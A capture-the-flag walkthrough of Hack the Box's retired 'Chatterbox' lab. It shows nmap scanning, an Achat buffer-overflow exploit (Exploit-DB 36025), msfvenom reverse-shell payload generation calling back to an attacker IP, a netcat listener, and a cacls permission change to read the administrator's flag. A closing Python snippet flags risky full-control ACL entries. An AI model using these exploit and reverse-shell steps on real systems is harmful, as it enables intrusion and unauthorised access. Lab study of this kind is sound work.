Hello friends!! Today we are going to solve another CTF challenge, “Chatterbox”, which is categorized as a retired lab presented by Hack the Box for online penetration testing practice.
Level: Easy
Task: find the user.txt and root.txt files on the victim’s machine.
Since these labs are accessible online, they have static IPs. The IP of Chatterbox is 10.10.10.74, so let’s start with nmap port enumeration.
nmap -p1-10000 10.10.10.74
It showed that two ports are open but didn’t disclose the services running on them.
Therefore we took help from Google and asked it to look for any exploit related to these ports, as shown in the image below. It put up two exploits related to Achat. First, we tried the Metasploit exploit to compromise the victim’s machine and almost successfully got a Meterpreter session, but the session kept dying within a few seconds.
Thus we chose the manual technique to compromise the victim's machine, using Exploit-DB 36025.
Exploit 36025 is already stored inside Kali Linux, and we copied it to the Desktop.
cd Desktop
cp /usr/share/exploitdb/exploits/windows/remote/36025.py .
cat 36025.py
According to this Python script, it is exploitable through a buffer overflow, and the highlighted msfvenom command is used to generate the payload.
With the help of the above script, we executed the following command to generate the payload.
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.25 lport=1234 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Then we copied the generated shellcode.
Now open the original 36025.py which you saved on the Desktop, paste the copied shellcode into it, and then enter the victim’s IP (10.10.10.74) as Server_address. Start Netcat for the reverse connection before running this script.
nc -lvp 1234
Now run your Python script to launch the buffer overflow attack on the victim’s machine.
python 36025.py
BOOooOOMM!! Here we have a command shell on the victim’s machine. Let’s finish this task by grabbing both flags.
Inside C:\Users\Alfred\Desktop we found the user.txt flag and used the type “filename” command to read this file.
cd Desktop
type user.txt
Great!! We got our 1st flag successfully.
Inside C:\Users\Administrator\Desktop I found the root.txt file and used the type “filename” command to read this file.
cd Desktop
type root.txt
But this file didn’t open due to insufficient permissions.
With the help of the following cacls commands, we can observe the permissions and change the file's permissions; here we granted read access to user Alfred for the root.txt file.
cacls C:\Users\Administrator\Desktop
cacls root.txt /g Alfred:r
type root.txt
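The cacls step only works when the low-privileged account is allowed to rewrite the DACL, which full control (F) on the folder or ownership of the file provides. As an added example (not part of the original walkthrough), this Python check parses cacls output and flags principals outside an expected baseline that hold F on an administrator's folder; the sample output, the CHATTERBOX account names and the trusted baseline are constructed assumptions.

```python
import re

# Constructed sample of `cacls` output. The ACL entries and the CHATTERBOX
# account names are assumptions for illustration, not output from the box.
SAMPLE_PATH = r"C:\Users\Administrator\Desktop"
SAMPLE = r"""C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                               CHATTERBOX\Administrator:(OI)(CI)(ID)F
                               BUILTIN\Administrators:(OI)(CI)(ID)F
                               CHATTERBOX\Alfred:(OI)(CI)(ID)F
"""

# Assumed baseline of principals allowed full control on an admin profile.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}
# Simple cacls rights: N none, R read, W write, C change, F full control.
# Multi-line "(special access:)" entries do not match and are skipped.
ENTRY = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Z]{2}\))*)(?P<right>[NRWCF])$")


def parse_cacls(output, path):
    """Return (principal, inheritance_flags, right) for each simple ACE."""
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):  # only the first line carries the path
            line = line[len(path):].strip()
        m = ENTRY.match(line)
        if m:
            flags = re.findall(r"\((\w{2})\)", m["flags"])
            entries.append((m["who"], flags, m["right"]))
    return entries


def risky_entries(entries, profile_owner):
    """Principals outside the baseline with F, which includes WRITE_DAC."""
    allowed = TRUSTED | {profile_owner}
    return [(who, right) for who, _flags, right in entries
            if right == "F" and who not in allowed]


if __name__ == "__main__":
    found = risky_entries(parse_cacls(SAMPLE, SAMPLE_PATH),
                          r"CHATTERBOX\Administrator")
    for who, right in found:
        print(f"{SAMPLE_PATH}: {who} holds {right} and can rewrite the DACL")
```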
Congratulations!! The 2nd task is also completed.